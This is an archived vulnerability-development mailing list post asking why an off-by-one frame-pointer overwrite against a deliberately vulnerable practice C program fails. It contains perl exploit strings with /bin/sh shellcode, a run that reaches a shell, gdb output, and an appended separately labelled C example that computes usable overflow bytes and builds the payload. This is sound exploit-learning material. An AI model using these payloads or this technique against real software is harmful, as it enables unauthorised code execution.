Vulnerability Development mailing list archives

Frame Pointer Overwriting


From: mike cramp <mikecc () unixclan net>
Date: 23 May 2003 10:24:59 -0700

Hey guys, 

I'm having some trouble with frame pointer overwriting, and I was
wondering if anyone could shed any light on this.

First of all, here is the vulnerable program:

mikecc@darkstar frame $ cat vuln_6.c 
/* Is It Vulnerable!? you sure? check again! */
/* 
 * bob.dtors.net
 *   
 *  ---------------------------------------------------
 *  Dtors Security Research (DSR)
 *  Code by: bob
 *  Mail: bob () dtors net
 *  ---------------------------------------------------
 * 
 * Build it and exploit it
 * show us the exploitation log and get extra rights !!  
 *
 *
 * Is It Vulnerable!? you sure? check again!
 * -- this code was taken from bob's personal homepage
 * http://it.dtors.net
*/


#include <stdio.h>
#include <stdlib.h>     /* exit() */
#include <string.h>
#define SIZE 256

void bob(char *ptr) {
    char buffer[SIZE];
    /* Intended off-by-one: copies SIZE+1 bytes into a SIZE-byte buffer,
     * so the byte right after buffer[SIZE-1] (the low byte of the saved
     * frame pointer in this frame layout) is overwritten. */
    strncpy(buffer, ptr, SIZE+1);
    printf("buffer is at %p\n", buffer);
    {
        int a, b;
        /* Dump all SIZE+1 bytes (including the overflow byte), 26 per line */
        for (a = b = 0; a <= SIZE; a++, b += 3) {
            if (b != 0 && !(b % 26)) printf("\n");
            printf("%02x ", (unsigned char)buffer[a]);
        }
        printf("\n");
    }
}

int main(int argc, char **argv, char **envp) {
    if (argc < 2)
    {
        fprintf(stdout, "bob () dtors net\n");
        exit(1);
    }
    bob(argv[1]);
    return 0;
}
mikecc@darkstar frame $ 

Now, I can exploit this if I store the shellcode in the environment:

mikecc@darkstar frame $ ./6 `perl -e 'print "\xd0\xfd\xff\xbf"x64 . "\x00"'`
buffer is at 0xbffff4a8
d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd
ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf
d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd
ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf
d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd
ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf
d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd
ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf
d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd
ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf 00
sh-2.05b$ 

But I do not understand how to find the overflow byte, or why this one
works: \x00

Now since I am researching a remote frame pointer overwrite, I need to
learn how to store the exploit string in the command line:


mikecc@darkstar frame $ ./6 `perl -e 'print "\x6a\x0b\x58\x99\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\xe3\x52\x53\x89\xe1\xcd\x80\x90\x90" . "\x63\xf9\xff\xbf"x58 . "\x09"'`
buffer is at 0xbffff6a8
6a 0b 58 99 52 68 6e 2f 73 68 68 2f 2f 62 69 e3 52 53 89 e1 cd 80 90 90 63 f9
ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf
63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9
ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf
63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9
ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf
63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9
ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf
63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9
ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 00
Illegal instruction (core dumped)
mikecc@darkstar frame $ 

When I open up the core dump, I check ebp:

(gdb) i reg ebp
ebp            0xbffff963       0xbffff963
(gdb) 

Now since I cannot copy and paste weird ASCII characters in Evolution, I
do:

x/s $ebp

and it shows my shellcode.  Why is this not executing a shell?

Thanks,

Mike
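The following is an added worked example and not part of Mike's post or of the vuln_6.c code. It models the arithmetic behind the frame pointer overwrite the post is asking about: the off-by-one replaces the low byte of the saved EBP, bob() returns normally, and then main's own epilogue ("leave; ret") takes the corrupted EBP as its stack pointer, pops [fake_ebp] into EBP and returns through [fake_ebp + 4]. The overflow byte is therefore usable only if fake_ebp + 4 lands on an intact, correctly aligned copy of the pointer inside the buffer. The code assumes the saved EBP sits at buffer + SIZE with no padding (a real gcc frame may pad, so the true saved-EBP address should be read from gdb before relying on the byte this picks); the struct and function names are mine, and the addresses and pointer values are taken from the first run in the post as constructed sample input.

```c
/* Added example, not code from the post: models a one-byte saved-EBP
 * overwrite on 32-bit x86 and works out which overflow bytes are usable.
 * Assumption: the saved EBP sits at buffer + SIZE with no padding. Real gcc
 * frames may pad, so take the true saved-EBP address from gdb before
 * trusting the byte chosen here. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define SIZE 256

struct frame_model {
    uint32_t buffer_addr;  /* address of buffer[0], as the program prints it */
    uint32_t saved_ebp;    /* main's EBP, stored right after buffer (assumed) */
};

/* The off-by-one replaces only the low byte of the saved EBP. */
uint32_t fake_ebp(uint32_t saved_ebp, uint8_t overflow_byte)
{
    return (saved_ebp & 0xffffff00u) | overflow_byte;
}

/* Little-endian word at an offset into the SIZE+1 byte payload. */
static uint32_t word_at(const uint8_t *payload, int off)
{
    return (uint32_t)payload[off] | (uint32_t)payload[off + 1] << 8 |
           (uint32_t)payload[off + 2] << 16 | (uint32_t)payload[off + 3] << 24;
}

/* main's epilogue runs "leave; ret": esp = fake_ebp, pop ebp, then
 * eip = [fake_ebp + 4]. Returns the buffer offset that word is read from,
 * or -1 if it does not lie entirely inside the attacker-controlled bytes. */
int eip_slot_offset(const struct frame_model *f, uint8_t overflow_byte)
{
    uint32_t slot = fake_ebp(f->saved_ebp, overflow_byte) + 4;
    if (slot < f->buffer_addr || slot + 4 > f->buffer_addr + SIZE)
        return -1;
    return (int)(slot - f->buffer_addr);
}

/* Address main will return to for this payload and overflow byte
 * (0 when the slot falls outside the buffer). */
uint32_t hijacked_eip(const struct frame_model *f, const uint8_t *payload,
                      uint8_t overflow_byte)
{
    int off = eip_slot_offset(f, overflow_byte);
    return off < 0 ? 0 : word_at(payload, off);
}

/* Every overflow byte that lands the return address exactly on a copy of
 * target; stores them in out (room for 256) and returns the count. */
int usable_overflow_bytes(const struct frame_model *f, const uint8_t *payload,
                          uint32_t target, uint8_t *out)
{
    int n = 0;
    for (int b = 0; b < 256; b++)
        if (hijacked_eip(f, payload, (uint8_t)b) == target)
            out[n++] = (uint8_t)b;
    return n;
}

/* [shellcode][target repeated, little-endian][overflow byte], SIZE+1 bytes:
 * the layout of the perl one-liners in the post. */
void build_payload(uint8_t *payload, const uint8_t *sc, int sc_len,
                   uint32_t target, uint8_t overflow_byte)
{
    if (sc_len > 0)
        memcpy(payload, sc, (size_t)sc_len);
    for (int i = sc_len; i < SIZE; i++)
        payload[i] = (uint8_t)(target >> (8 * ((i - sc_len) % 4)));
    payload[SIZE] = overflow_byte;
}

int main(void)
{
    /* Constructed from the first run in the post: buffer at 0xbffff4a8,
     * every word 0xbffffdd0 (shellcode in the environment), byte 0x00. */
    struct frame_model f = { 0xbffff4a8u, 0xbffff4a8u + SIZE };
    uint8_t payload[SIZE + 1], bytes[256];
    build_payload(payload, NULL, 0, 0xbffffdd0u, 0x00);

    printf("byte 0x00: fake ebp %08x, eip read from buffer+%d -> %08x\n",
           fake_ebp(f.saved_ebp, 0x00), eip_slot_offset(&f, 0x00),
           hijacked_eip(&f, payload, 0x00));
    int n = usable_overflow_bytes(&f, payload, 0xbffffdd0u, bytes);
    printf("%d bytes work for this layout, from 0x%02x to 0x%02x\n",
           n, bytes[0], bytes[n - 1]);
    return 0;
}
```

For the first run this reproduces why \x00 works: fake EBP 0xbffff500 puts the return-address slot at buffer+92, a 4-byte-aligned copy of 0xbffffdd0. To apply it to the second run, replace the assumed saved_ebp with the real one from gdb (break in bob and inspect the saved frame pointer, or compare against the ebp value the core dump reports, which is the word main popped from [fake_ebp]), and pass the 24-byte shellcode as sc so that the pointer words start at offset 24 instead of 0; the check then tells you whether a given byte lands on an intact copy of the pointer or on a misaligned fragment of it.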


